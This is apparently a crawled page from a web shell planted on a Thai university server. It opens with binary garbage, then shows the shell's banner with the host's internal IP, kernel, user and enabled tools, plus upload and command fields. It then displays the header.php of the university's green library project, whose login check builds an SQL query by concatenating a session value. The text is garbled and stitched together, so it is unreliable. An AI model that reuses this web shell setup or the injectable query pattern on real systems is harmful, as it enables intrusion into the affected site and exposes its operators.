h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/green/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/green/header.php
<?php session_start();?>
<?php include 'dbconnect.php';?>
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

  <title>โครงการห้องสมุดสีเขียวและสำนักงานสีเขียว สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา</title>
  <meta content="" name="description">
  <meta content="" name="keywords">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Google Fonts -->
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="assets/vendor/animate.css/animate.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="assets/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
  <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
  <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">

  <!-- Template Main CSS File -->
  <link href="assets/css/style.css" rel="stylesheet">

  <!-- =======================================================
  * Template Name: Green
  * Updated: Jul 27 2023 with Bootstrap v5.3.1
  * Template URL: https://bootstrapmade.com/green-free-one-page-bootstrap-template/
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body>
  <!-- ======= Header ======= -->
  <header id="header" class="d-flex align-items-center">
    <div class="container d-flex align-items-center">

      <img src="./assets/img/logo.png" width="50" height="60">
      <!-- Uncomment below if you prefer to use an image logo -->
      <!-- <a href="index.html" class="logo me-auto"><img src="assets/img/logo.png" alt="" class="img-fluid"></a>-->

      <nav id="navbar" class="navbar">
        <ul>
          <li><a class="nav-link scrollto active" href="index.php">หน้าแรก</a></li>
          <li><a class="nav-link scrollto" href="index.php#about">นโยบายสีเขียว</a></li>
		  <li><a class="nav-link scrollto" href="images/criteria-GreenLibNew2023.pdf" target="_blank">เกณฑ์การประเมินห้องสมุดสีเขียว</a></li>
          <li><a class="nav-link scrollto" href="index.php#why-us">การดำเนินงาน</a></li>
          <li><a class="nav-link scrollto " href="index.php#services">ภาพกิจกรรม</a></li>
		  <li><a class="nav-link scrollto " href="network.php">เครือข่ายความร่วมมือ</a></li>
          <!--<li><a class="nav-link scrollto" href="index.php#portfolio">ภาพกิจกรรมสีเขียว</a></li>-->
          <!--<li><a class="nav-link scrollto" href="index.php#footer">ติดต่อเรา</a></li>-->
		<?php
		if($_SESSION['USERNAME_arit67']) {
			$sql_check = "SELECT * FROM staff WHERE staff_code='" . $_SESSION['USERNAME_arit67'] . "'";
			$query_check = mysqli_query($conn,$sql_check);
			if ($result_check=mysqli_fetch_array($query_check,MYSQLI_ASSOC)) {
		?>
								<li><a href="admin/index.php" title="แก้ไขข้อมูล"><button type="button" class="btn btn-success btn-sm">แก้ไขข้อมูล</button></a></li>
		<?php
			} //if ($result_check=mysqli_fetch_array($query_check,MYSQLI_ASSOC))
		?>
								<li><a class="getstarted scrollto" href="logout.php">Logout</a>								</li>
		<?php
		} else { //if($_SESSION['USERNAME_intres025'])
		?>
								<li><a class="getstarted scrollto" href="https://arit.skru.ac.th/login/pages/login.php?lp=green">Login</a>								</li>
		<?php
		} //if($_SESSION['USERNAME_intres025'])
		?>	

        </ul>
        <i class="bi bi-list mobile-nav-toggle"></i>
      </nav><!-- .navbar -->

    </div>
  </header><!-- End Header -->

  <!-- ======= Hero Section ======= -->
  <section id="hero">
    <div id="heroCarousel" data-bs-interval="5000" class="carousel slide carousel-fade" data-bs-ride="carousel">

      <ol class="carousel-indicators" id="hero-carousel-indicators"></ol>

      <div class="carousel-inner" role="listbox">

        <!-- Slide 1 -->
        <div class="carousel-item active" style="background-image: url(assets/img/activity/p2/p2_1.jpg)">
          <div class="carousel-container">
            <div class="container"> 
              <img src="./assets/img/LogoGreenOffice.png" width="600" height="300">                             
              <h2 class="animate__animated animate__fadeInDown">-โครงการห้องสมุดสีเขียวและสำนักงานสีเขียว-</h2><h5 class="animate__animated animate__fadeInDown" style="color:#ffffff;">สำนักวิทยบริการและเทคโนโลยีสารสนเทศ มหาวิทยาลัยราชภัฏสงขลา</h5>                                      
              <a href="#about" class="btn-get-started animate__animated animate__fadeInUp scrollto">ดูรายละเอียด</a>            </div>
          </div>
        </div>

        <!-- Slide 2 -->
        <div class="carousel-item" style="background-image: url(assets/img/activity/p1/a14.jpg)">
          <div class="carousel-container">
            <div class="container">
              <h2 class="animate__animated animate__fadeInDown">-ส่งเสริมบุคคล-</h2>
              <p class="animate__animated animate__fadeInUp">ส่งเสริมให้บุคลากรของสํานักฯ และผู้รับบริการมีความรู้ความเข้าใจ มีความตระหนักรู้ในเรื่อง
                การอนุรักษ์พลังงานและสิ่งแวดล้อม</p>
              <a href="#about" class="btn-get-started animate__animated animate__fadeInUp scrollto">ดูรายละเอียด</a>            </div>
          </div>
        </div>

        <!-- Slide 3 -->
        <div class="carousel-item" style="background-image: url(assets/img/activity/p1/a3.jpg)">
          <div class="carousel-container">
            <div class="container">
              <h2 class="animate__animated animate__fadeInDown">-พัฒนาความร่วมมือ-</h2>
              <p class="animate__animated animate__fadeInUp">พัฒนาความร่วมมือในลักษณะเครือข่าย เพื่อสร้างเครือข่ายการเรียนรู้ แลกเปลี่ยน
                ประสบการณ์ และจัดการความรู้ร่วมกัน</p>
              <a href="#about" class="btn-get-started animate__animated animate__fadeInUp scrollto">ดูรายละเอียด</a>            </div>
          </div>
        </div>

      </div>

      <a class="carousel-control-prev" href="#heroCarousel" role="button" data-bs-slide="prev">
        <span class="carousel-control-prev-icon bi bi-chevron-left" aria-hidden="true"></span>
      </a>

      <a class="carousel-control-next" href="#heroCarousel" role="button" data-bs-slide="next">
        <span class="carousel-control-next-icon bi bi-chevron-right" aria-hidden="true"></span>
      </a>

    </div>
  </section><!-- End Hero -->

  <main id="main">

Youez - 2016 - github.com/yon3zu
LinuXploit